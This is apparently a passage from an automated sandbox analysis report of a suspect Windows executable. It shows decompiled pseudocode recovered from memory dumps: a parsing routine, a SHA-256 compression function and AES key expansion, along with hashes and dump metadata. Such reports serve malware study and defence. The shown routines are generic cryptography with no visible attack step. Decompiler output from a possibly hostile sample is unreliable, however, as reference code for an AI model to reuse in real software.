					_v60 = _t484;
					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
						goto L2;
					}
					_t438 = _v52;
					_t475 = _v68;
					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
					_t489 = _v8 & 0x0000ffff;
					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
					_t481 = _t484 + _t489;
					_t362 = 0xfffffffe;
					_v60 = _t481;
					_v16 = _v16 + _t362 - _t489;
					_t486 = E00418DC2(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
					_t492 = _t492 + 0xc;
					if(_t486 < 0) {
						goto L120;
					} else {
						_t436 = _v52;
						_t445 = _v56;
						goto L23;
					}
				}
				if(_t480 - _t379 + 1 <= _a8) {
					_t370 =  *((intOrPtr*)(_t480 + _v12));
					_t485 = _t480 + 1;
					_v7 = _t370;
					_t371 = _t370 & 0x000000ff;
					_v20 = _t371;
					_v60 = _t485;
					if(_t371 - _t379 + _t485 > _a8) {
						goto L2;
					}
					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
						_t480 = _t485 + _v20;
						_push(0x48);
						_v60 = _t480;
						_t374 = E00427471();
						_v68 = _t374;
						if(_t374 != 0) {
							goto L9;
						}
						goto L8;
					} else {
						_t486 = 0xfffffe5c;
						goto L120;
					}
				}
				goto L2;
			}





































































                                            0x00414278
                                            0x0041427a
                                            0x00414284
                                            0x00414285
                                            0x0041428c
                                            0x0041428e
                                            0x0041428e
                                            0x00414290
                                            0x00414296
                                            0x00414299
                                            0x0041429f
                                            0x004142a6
                                            0x004142a9
                                            0x004142ab
                                            0x004142b1
                                            0x00414318
                                            0x00414318
                                            0x0041431b
                                            0x00414320
                                            0x00414325
                                            0x00414310
                                            0x00414312
                                            0x004149b1
                                            0x004149b4
                                            0x004149bb
                                            0x004149c8
                                            0x004149c8
                                            0x0041432c
                                            0x00414333
                                            0x0041433f
                                            0x004142bd
                                            0x004142bd
                                            0x00000000
                                            0x004142bd
                                            0x0041434e
                                            0x00414353
                                            0x00414356
                                            0x00414359
                                            0x0041435c
                                            0x00414365
                                            0x00000000
                                            0x00000000
                                            0x0041436b
                                            0x00414377
                                            0x00000000
                                            0x00000000
                                            0x0041437f
                                            0x00414382
                                            0x004144a1
                                            0x004144a1
                                            0x004144aa
                                            0x004144af
                                            0x004144f3
                                            0x004144fd
                                            0x00414506
                                            0x00414508
                                            0x0041450d
                                            0x00000000
                                            0x00000000
                                            0x0041451b
                                            0x00414520
                                            0x00414525
                                            0x00414526
                                            0x00414529
                                            0x00414531
                                            0x00414693
                                            0x00414695
                                            0x00000000
                                            0x00000000
                                            0x0041469b
                                            0x004146a5
                                            0x00414744
                                            0x00414746
                                            0x00414746
                                            0x00414747
                                            0x0041474a
                                            0x0041474c
                                            0x0041474f
                                            0x0041475d
                                            0x00414764
                                            0x00414906
                                            0x0041490b
                                            0x00414919
                                            0x00414920
                                            0x00414924
                                            0x00414924
                                            0x0041493a
                                            0x0041493c
                                            0x00414946
                                            0x0041494c
                                            0x0041495e
                                            0x00414965
                                            0x00414965
                                            0x00414969
                                            0x00414985
                                            0x00414987
                                            0x00414987
                                            0x0041496b
                                            0x0041496e
                                            0x00414974
                                            0x00414974
                                            0x00414979
                                            0x00414979
                                            0x00414990
                                            0x00414997
                                            0x0041499a
                                            0x0041499c
                                            0x004149a2
                                            0x004149a2
                                            0x004149a8
                                            0x004149af
                                            0x004149af
                                            0x00000000
                                            0x0041490b
                                            0x00414775
                                            0x0041477d
                                            0x00414797
                                            0x00414797
                                            0x0041479a
                                            0x004147a2
                                            0x004147c1
                                            0x004147c1
                                            0x004147a2
                                            0x004147ca
                                            0x004147d6
                                            0x004147f4
                                            0x004147d8
                                            0x004147df
                                            0x004147e1
                                            0x004147e1
                                            0x004147df
                                            0x004147d6
                                            0x004147fa
                                            0x0041480c
                                            0x0041481e
                                            0x00414820
                                            0x00414828
                                            0x0041482e
                                            0x00414850
                                            0x0041485d
                                            0x00414830
                                            0x00414830
                                            0x00414840
                                            0x00414842
                                            0x00414842
                                            0x00414840
                                            0x0041482e
                                            0x00414828
                                            0x00414867
                                            0x00000000
                                            0x0041486d
                                            0x0041486d
                                            0x00414871
                                            0x00414877
                                            0x0041487b
                                            0x00414891
                                            0x004148ad
                                            0x004148b7
                                            0x004148c0
                                            0x004148cb
                                            0x004148cb
                                            0x004148d0
                                            0x004148d2
                                            0x004148f0
                                            0x00414903
                                            0x00414903
                                            0x00000000
                                            0x004148d2
                                            0x004148c3
                                            0x00000000
                                            0x004148c3
                                            0x00414896
                                            0x0041489b
                                            0x004148a2
                                            0x004148a5
                                            0x00000000
                                            0x00000000
                                            0x004148a7
                                            0x00000000
                                            0x004148a7
                                            0x0041487d
                                            0x00414880
                                            0x00414883
                                            0x00000000
                                            0x00414883
                                            0x004147fc
                                            0x004147fc
                                            0x00000000
                                            0x004147fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0041474f
                                            0x004146ab
                                            0x004146d0
                                            0x004146d7
                                            0x00414709
                                            0x00414738
                                            0x0041473d
                                            0x0041473e
                                            0x00414713
                                            0x00414713
                                            0x00414718
                                            0x00414720
                                            0x00414732
                                            0x00414722
                                            0x0041472c
                                            0x0041472c
                                            0x00414720
                                            0x00000000
                                            0x00414709
                                            0x004146d9
                                            0x004146dc
                                            0x004146e2
                                            0x004146fd
                                            0x00000000
                                            0x004146e4
                                            0x004146e4
                                            0x004146e7
                                            0x004146e8
                                            0x00000000
                                            0x004146e8
                                            0x0041453f
                                            0x0041453f
                                            0x00414543
                                            0x00414563
                                            0x00414568
                                            0x0041456d
                                            0x00414574
                                            0x00414574
                                            0x0041458c
                                            0x0041459a
                                            0x0041459d
                                            0x004145af
                                            0x004145b6
                                            0x004145b6
                                            0x004145b8
                                            0x004145bd
                                            0x0041464a
                                            0x00414655
                                            0x0041465b
                                            0x0041465b
                                            0x00414664
                                            0x0041466a
                                            0x0041466c
                                            0x0041466f
                                            0x0041466f
                                            0x00000000
                                            0x0041466a
                                            0x004145ca
                                            0x004145f2
                                            0x00414601
                                            0x00414607
                                            0x00000000
                                            0x00000000
                                            0x0041461f
                                            0x00414629
                                            0x00414642
                                            0x00414648
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00414648
                                            0x00414671
                                            0x00414671
                                            0x00414673
                                            0x0041467f
                                            0x00414683
                                            0x00414687
                                            0x00414688
                                            0x0041468b
                                            0x00000000
                                            0x0041453f
                                            0x00414531
                                            0x004144b8
                                            0x004144dc
                                            0x004144e3
                                            0x004144e5
                                            0x004144ee
                                            0x004144ee
                                            0x00000000
                                            0x004144e3
                                            0x004144c6
                                            0x00000000
                                            0x00000000
                                            0x004144d0
                                            0x004144d5
                                            0x004144da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004144da
                                            0x00000000
                                            0x00414388
                                            0x00414391
                                            0x004146ee
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004143a0
                                            0x004143aa
                                            0x00000000
                                            0x00000000
                                            0x004143b9
                                            0x004143c1
                                            0x004143c9
                                            0x004143cf
                                            0x00000000
                                            0x00000000
                                            0x004143d5
                                            0x004143e0
                                            0x004143ec
                                            0x004143ef
                                            0x004143f2
                                            0x004143f5
                                            0x004143f8
                                            0x004143fc
                                            0x0041440b
                                            0x00414493
                                            0x00414493
                                            0x00414498
                                            0x0041449b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0041449b
                                            0x0041441b
                                            0x00000000
                                            0x00000000
                                            0x00414421
                                            0x0041442a
                                            0x00414433
                                            0x0041443b
                                            0x00414441
                                            0x00000000
                                            0x00000000
                                            0x00414447
                                            0x0041444a
                                            0x00414453
                                            0x0041445a
                                            0x0041445e
                                            0x00414461
                                            0x00414463
                                            0x00414466
                                            0x00414469
                                            0x00414480
                                            0x00414482
                                            0x00414487
                                            0x00000000
                                            0x0041448d
                                            0x0041448d
                                            0x00414490
                                            0x00000000
                                            0x00414490
                                            0x00414487
                                            0x004142bb
                                            0x004142ca
                                            0x004142cd
                                            0x004142ce
                                            0x004142d1
                                            0x004142d4
                                            0x004142db
                                            0x004142e1
                                            0x00000000
                                            0x00000000
                                            0x004142e9
                                            0x004142fb
                                            0x004142fe
                                            0x00414301
                                            0x00414304
                                            0x00414309
                                            0x0041430e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004142f1
                                            0x004142f1
                                            0x00000000
                                            0x004142f1
                                            0x004142e9
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efeff1f051e50ba2a07c3e49b82ee56d3057c64e2cd302929a248b0661d52162
                                            • Instruction ID: 5d42fd67efc9d9d8e7c009709455020428e32dbceffd9eb716049d47bee96069
                                            • Opcode Fuzzy Hash: efeff1f051e50ba2a07c3e49b82ee56d3057c64e2cd302929a248b0661d52162
                                            • Instruction Fuzzy Hash: 8C22C171A002199BCF15DF68C4807EEB7B5AF84314F18417AEC55AB386DB389E81CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00427EA4, Relevance: .5, Instructions: 504COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00427EA4(void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void _v72;
				void* _v76;
				void* _v276;
				void _v332;
				void* _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t294;
				intOrPtr _t295;
				unsigned int _t297;
				void* _t299;
				signed int _t301;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				void* _t433;
				void* _t434;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				signed int _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				signed int _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				signed int _t476;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				signed int _t487;
				void* _t506;
				void* _t513;
				void* _t520;
				void* _t527;
				void* _t534;
				void* _t541;
				void* _t548;
				void* _t555;
				unsigned int _t558;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t578;
				signed int _t583;
				signed int _t588;
				signed int _t593;
				signed int _t598;
				void* _t603;

				_t400 = __edx;
				_v12 = 0x30;
				_t301 = 8;
				_v76 = __ecx;
				memcpy( &_v72, __ecx, _t301 << 2);
				_push(0x10);
				_t204 = memcpy( &_v332, _t400, 0 << 2);
				_v40 = _t204;
				do {
					_t558 =  *_t204;
					_t297 =  *(_t204 - 0x34);
					_t401 = 0x13;
					_t205 = E00427DE1(_t558, _t401);
					_t402 = 0x11;
					_t206 = E00427DE1(_t558, _t402);
					_t403 = 0x12;
					_t207 = E00427DE1(_t297, _t403);
					_t404 = 7;
					_t208 = E00427DE1(_t297, _t404);
					_t209 = _v40;
					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
					_t204 = _t209 + 4;
					_t14 =  &_v12;
					 *_t14 = _v12 - 1;
					_v40 = _t204;
				} while ( *_t14 != 0);
				_v40 = _v40 & 0x00000000;
				_t563 = _v44;
				_v32 = _v60;
				_v20 = _v48;
				_v24 = _v64;
				_v16 = _v52;
				_t212 = _v56;
				_v28 = _v68;
				_t299 = 2;
				_v8 = _v56;
				_v36 = _v72;
				do {
					_t405 = 0x19;
					_t213 = E00427DE1(_t212, _t405);
					_t406 = 0xb;
					_t214 = E00427DE1(_v8, _t406);
					_t407 = 6;
					_t215 = E00427DE1(_v8, _t407);
					_t216 = _v40;
					_t42 = _t216 + 0x45acd8; // 0x428a2f98
					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
					_v32 = _v32 + _t506;
					_t408 = 0x16;
					_t217 = E00427DE1(_v36, _t408);
					_t409 = 0xd;
					_t218 = E00427DE1(_v36, _t409);
					_t219 = E00427DE1(_v36, _t299);
					_t568 = _v32;
					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
					_t411 = 0x19;
					_t222 = E00427DE1(_t568, _t411);
					_t412 = 0xb;
					_t223 = E00427DE1(_t568, _t412);
					_t413 = 6;
					_t224 = E00427DE1(_t568, _t413);
					_t225 = _v40;
					_t60 = _t225 + 0x45acdc; // 0x71374491
					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
					_v24 = _v24 + _t513;
					_t414 = 0x16;
					_t226 = E00427DE1(_v12, _t414);
					_t415 = 0xd;
					_t227 = E00427DE1(_v12, _t415);
					_t228 = E00427DE1(_v12, _t299);
					_t573 = _v24;
					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
					_t422 = 0x19;
					_t231 = E00427DE1(_t573, _t422);
					_t423 = 0xb;
					_t232 = E00427DE1(_t573, _t423);
					_t424 = 6;
					_t233 = E00427DE1(_t573, _t424);
					_t234 = _v40;
					_t79 = _t234 + 0x45ace0; // 0xb5c0fbcf
					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
					_v28 = _v28 + _t520;
					_t425 = 0x16;
					_t235 = E00427DE1(_v20, _t425);
					_t426 = 0xd;
					_t236 = E00427DE1(_v20, _t426);
					_t237 = E00427DE1(_v20, _t299);
					_t578 = _v28;
					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
					_t433 = 0x19;
					_t240 = E00427DE1(_t578, _t433);
					_t434 = 0xb;
					_t241 = E00427DE1(_t578, _t434);
					_t435 = 6;
					_t242 = E00427DE1(_t578, _t435);
					_t243 = _v40;
					_t98 = _t243 + 0x45ace4; // 0xe9b5dba5
					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
					_v36 = _v36 + _t527;
					_t436 = 0x16;
					_t244 = E00427DE1(_v16, _t436);
					_t437 = 0xd;
					_t245 = E00427DE1(_v16, _t437);
					_t246 = E00427DE1(_v16, _t299);
					_t583 = _v36;
					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
					_t444 = 0x19;
					_t249 = E00427DE1(_t583, _t444);
					_t445 = 0xb;
					_t250 = E00427DE1(_t583, _t445);
					_t446 = 6;
					_t251 = E00427DE1(_t583, _t446);
					_t252 = _v40;
					_t117 = _t252 + 0x45ace8; // 0x3956c25b
					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
					_t254 = _v12 + _t534;
					_t447 = 0x16;
					_v12 = _t254;
					_v44 = _t254;
					_t255 = E00427DE1(_v8, _t447);
					_t448 = 0xd;
					_t256 = E00427DE1(_v8, _t448);
					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ E00427DE1(_v8, _t299)) + _t534;
					_t588 = _v12;
					_v32 = _t454;
					_v60 = _t454;
					_t455 = 0x19;
					_t260 = E00427DE1(_t588, _t455);
					_t456 = 0xb;
					_t261 = E00427DE1(_t588, _t456);
					_t457 = 6;
					_t262 = E00427DE1(_t588, _t457);
					_t263 = _v40;
					_t138 = _t263 + 0x45acec; // 0x59f111f1
					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
					_t265 = _v20 + _t541;
					_t458 = 0x16;
					_v20 = _t265;
					_v48 = _t265;
					_t266 = E00427DE1(_v32, _t458);
					_t459 = 0xd;
					_t267 = E00427DE1(_v32, _t459);
					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ E00427DE1(_v32, _t299)) + _t541;
					_t593 = _v20;
					_v24 = _t465;
					_v64 = _t465;
					_t466 = 0x19;
					_t271 = E00427DE1(_t593, _t466);
					_t467 = 0xb;
					_t272 = E00427DE1(_t593, _t467);
					_t468 = 6;
					_t273 = E00427DE1(_t593, _t468);
					_t158 = _v40 + 0x45acf0; // 0x923f82a4
					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
					_t276 = _v16 + _t548;
					_t469 = 0x16;
					_v16 = _t276;
					_v52 = _t276;
					_t277 = E00427DE1(_v24, _t469);
					_t470 = 0xd;
					_t278 = E00427DE1(_v24, _t470);
					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ E00427DE1(_v24, _t299)) + _t548;
					_t598 = _v16;
					_v28 = _t476;
					_v68 = _t476;
					_t477 = 0x19;
					_t282 = E00427DE1(_t598, _t477);
					_t478 = 0xb;
					_t283 = E00427DE1(_t598, _t478);
					_t479 = 6;
					_t284 = E00427DE1(_t598, _t479);
					_t285 = _v40;
					_t180 = _t285 + 0x45acf4; // 0xab1c5ed5
					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
					_t287 = _v8 + _t555;
					_t480 = 0x16;
					_v8 = _t287;
					_v56 = _t287;
					_t288 = E00427DE1(_v28, _t480);
					_t481 = 0xd;
					_t289 = E00427DE1(_v28, _t481);
					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ E00427DE1(_v28, _t299)) + _t555;
					_t563 = _v12;
					_t294 = _v40 + 0x20;
					_v40 = _t294;
					_t212 = _v8;
					_v36 = _t487;
					_v72 = _t487;
				} while (_t294 < 0x100);
				_t295 = _v76;
				do {
					asm("movups xmm0, [eax]");
					asm("movups xmm1, [ecx+eax]");
					asm("paddd xmm1, xmm0");
					asm("movups [eax], xmm1");
					_t295 = _t295 + 0x10;
					_t299 = _t299 - 1;
				} while (_t299 != 0);
				return 0;
			}





















































































































































                                            0x00427ea4
                                            0x00427eb2
                                            0x00427ebb
                                            0x00427ebc
                                            0x00427ec2
                                            0x00427ec4
                                            0x00427ed5
                                            0x00427ed7
                                            0x00427eda
                                            0x00427eda
                                            0x00427ede
                                            0x00427ee3
                                            0x00427ee4
                                            0x00427eeb
                                            0x00427ef0
                                            0x00427efc
                                            0x00427f01
                                            0x00427f08
                                            0x00427f0d
                                            0x00427f17
                                            0x00427f24
                                            0x00427f27
                                            0x00427f2a
                                            0x00427f2a
                                            0x00427f2e
                                            0x00427f2e
                                            0x00427f39
                                            0x00427f3d
                                            0x00427f40
                                            0x00427f46
                                            0x00427f4c
                                            0x00427f54
                                            0x00427f57
                                            0x00427f5a
                                            0x00427f60
                                            0x00427f61
                                            0x00427f64
                                            0x00427f67
                                            0x00427f69
                                            0x00427f6c
                                            0x00427f78
                                            0x00427f79
                                            0x00427f85
                                            0x00427f86
                                            0x00427f96
                                            0x00427fa3
                                            0x00427fb0
                                            0x00427fb2
                                            0x00427fb5
                                            0x00427fb6
                                            0x00427fc2
                                            0x00427fc3
                                            0x00427fcf
                                            0x00427fea
                                            0x00427fed
                                            0x00427ff4
                                            0x00427ff5
                                            0x00427ffc
                                            0x00428001
                                            0x00428008
                                            0x0042800d
                                            0x0042801a
                                            0x00428029
                                            0x00428036
                                            0x00428039
                                            0x0042803c
                                            0x0042803d
                                            0x00428046
                                            0x0042804a
                                            0x00428056
                                            0x00428071
                                            0x00428076
                                            0x0042807b
                                            0x0042807c
                                            0x00428083
                                            0x00428088
                                            0x0042808f
                                            0x00428094
                                            0x004280a1
                                            0x004280b0
                                            0x004280bd
                                            0x004280c0
                                            0x004280c3
                                            0x004280c4
                                            0x004280d0
                                            0x004280d1
                                            0x004280dd
                                            0x004280f8
                                            0x004280fd
                                            0x00428102
                                            0x00428103
                                            0x0042810a
                                            0x0042810f
                                            0x00428116
                                            0x0042811b
                                            0x00428128
                                            0x00428137
                                            0x00428144
                                            0x00428147
                                            0x0042814a
                                            0x0042814b
                                            0x00428157
                                            0x00428158
                                            0x00428164
                                            0x0042817f
                                            0x00428184
                                            0x00428189
                                            0x0042818a
                                            0x00428191
                                            0x00428196
                                            0x0042819d
                                            0x004281a2
                                            0x004281af
                                            0x004281be
                                            0x004281ce
                                            0x004281d1
                                            0x004281d3
                                            0x004281d4
                                            0x004281d7
                                            0x004281da
                                            0x004281e6
                                            0x004281e7
                                            0x0042820c
                                            0x0042820e
                                            0x00428213
                                            0x00428218
                                            0x0042821b
                                            0x0042821c
                                            0x00428223
                                            0x00428228
                                            0x0042822f
                                            0x00428234
                                            0x00428241
                                            0x00428250
                                            0x00428260
                                            0x00428263
                                            0x00428265
                                            0x00428266
                                            0x00428269
                                            0x0042826c
                                            0x00428278
                                            0x00428279
                                            0x0042829e
                                            0x004282a0
                                            0x004282a5
                                            0x004282aa
                                            0x004282ad
                                            0x004282ae
                                            0x004282b5
                                            0x004282ba
                                            0x004282c1
                                            0x004282c6
                                            0x004282dd
                                            0x004282ed
                                            0x004282f3
                                            0x004282f7
                                            0x004282f8
                                            0x004282fb
                                            0x004282fe
                                            0x0042830a
                                            0x0042830b
                                            0x00428330
                                            0x00428332
                                            0x00428337
                                            0x0042833c
                                            0x0042833f
                                            0x00428340
                                            0x00428347
                                            0x0042834c
                                            0x00428353
                                            0x00428358
                                            0x00428365
                                            0x00428374
                                            0x00428384
                                            0x00428387
                                            0x00428389
                                            0x0042838a
                                            0x0042838d
                                            0x00428390
                                            0x0042839c
                                            0x0042839d
                                            0x004283c2
                                            0x004283c7
                                            0x004283ca
                                            0x004283cd
                                            0x004283d5
                                            0x004283d8
                                            0x004283db
                                            0x004283db
                                            0x004283e4
                                            0x004283ec
                                            0x004283ec
                                            0x004283ef
                                            0x004283f3
                                            0x004283f7
                                            0x004283fa
                                            0x004283fd
                                            0x004283fd
                                            0x0042840a

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 695550ae6f39c2b2ef5dd81fd7c8bc2e0349ec0cc61b46dba1175284532b7521
                                            • Instruction ID: 69b79b002b09f81561f5007b3b19c029fd8888db7754a741cd9f86285a609faa
                                            • Opcode Fuzzy Hash: 695550ae6f39c2b2ef5dd81fd7c8bc2e0349ec0cc61b46dba1175284532b7521
                                            • Instruction Fuzzy Hash: 38124032F102289BDF05DBE9D992AFDB3F2AF88314F25406AD505B7381DA796D41CB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041C086, Relevance: .4, Instructions: 411COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 99%
                                            			E0041C086(void* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				signed int _t250;
				signed int _t267;
				void* _t270;
				intOrPtr _t314;
				signed int _t330;
				signed int _t351;
				signed int _t369;
				signed int _t387;
				signed int _t406;
				signed int _t413;
				signed char* _t414;
				signed int _t425;
				signed int _t427;
				signed int _t431;
				intOrPtr _t455;
				signed int _t459;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t482;
				intOrPtr* _t493;
				signed int _t500;
				signed int _t506;
				signed int _t513;
				signed int _t519;
				signed int _t525;
				unsigned int _t527;
				signed int* _t528;
				void* _t530;
				intOrPtr* _t532;
				signed int* _t534;
				signed int* _t535;
				signed int* _t537;
				void* _t538;
				intOrPtr _t539;
				void* _t541;
				void* _t542;
				void* _t543;

				_push(__ecx);
				_t527 = _a4;
				_t537 = __ecx;
				_v8 = __ecx;
				 *(__ecx + 0xf4) = _t527;
				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
				E0042BC80(__ecx, __edx, _t527);
				E0041BA7E(_t537, _t537, _t527);
				if(_t527 == 0x10) {
					_t476 = _t537[3];
					_t528 =  &(_t537[1]);
					_t425 = ( *(0x457850 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x457450 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
					_t537[4] = _t425;
					_t250 =  *_t528 ^ _t425;
					_t427 = _t537[2] ^ _t250;
					_t537[5] = _t250;
					_t537[6] = _t427;
					_t537[7] = _t427 ^ _t476;
					_t538 = 4;
					do {
						_t528 =  &(_t528[4]);
						_t429 = _t528[2];
						_t122 = _t538 + 0x456024; // 0x2000000
						_t538 = _t538 + 4;
						_t482 =  *(0x457450 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457850 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x457050 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
						_t528[3] = _t482;
						_t267 =  *_t528 ^ _t482;
						_t528[4] = _t267;
						_t431 = _t528[1] ^ _t267;
						_t528[5] = _t431;
						_t528[6] = _t528[2] ^ _t431;
					} while (_t538 != 0x28);
					goto L12;
				} else {
					if(_t527 == 0x18) {
						_t457 = _t537[5];
						_t534 =  &(_t537[0xa]);
						_t500 = ( *(0x457850 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x457450 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x457c50 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
						_t330 = _t537[1] ^ _t500;
						_t537[6] = _t500;
						_t537[7] = _t330;
						_t459 = _t537[2] ^ _t330;
						_t537[8] = _t459;
						_t537[9] = _t537[3] ^ _t459;
						_t542 = 4;
						do {
							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
							 *_t534 = _t461;
							_t534[1] =  *(_t534 - 0x14) ^ _t461;
							_t534 =  &(_t534[6]);
							_t462 =  *(_t534 - 0x14);
							_t88 = _t542 + 0x456024; // 0x2000000
							_t542 = _t542 + 4;
